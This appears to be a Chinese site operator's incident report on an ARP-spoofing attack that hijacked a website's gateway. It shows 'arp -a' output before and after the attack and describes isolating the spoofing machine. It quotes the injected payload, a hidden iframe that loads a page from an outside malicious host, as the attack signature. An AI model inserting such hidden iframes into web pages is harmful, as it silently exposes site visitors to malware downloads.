|
近期电脑软硬件应用网所在服务器受到arp欺骗攻击,路由被劫持。
挂马特征:
在头部加入如下代码:
| <iframe style='display:none;' src=http://cool.47555.com/k.htm></iframe> |
解决和分析过程(借鉴绿盟路由被劫持案例):
被攻击时
x:\Documents and Settings\Administrator>arp -a
Interface: *.123.71.119 --- 0x2
Internet Address Physical Address Type
58.123.71.1 00-13-60-*-8e-c2 dynamic
Interface: *.123.225.231 --- 0x3
Internet Address Physical Address Type
222.123.225.2 00-15-c5-ec-e2-8d dynamic
222.123.225.* 00-c0-*-82-5c-fa dynamic |
00-15-c5-ec-e2-8d 这个机器冒充网关,劫持了电脑软硬件应用网
然后查内网的机器发现 00-15-c5-ec-e2-8d 就是 *.123.225.232 和电脑软硬件应用网的服务器同一网段
于是立即关闭该机器,刷新arp,恢复正常
正常后查询arp 结果如下
x:\Documents and Settings\Administrator>arp -a
Interface: *.123.71.119 --- 0x2
Internet Address Physical Address Type
58.123.71.1 00-13-60-*-8e-c2 dynamic
Interface: *.123.225.231 --- 0x3
Internet Address Physical Address Type
222.123.225.2 00-0e-38-6e-*-bf dynamic |
网关从 00-15-c5-ec-e2-8d 恢复为 00-0e-38-6e-*-bf
网站也恢复正常了
|
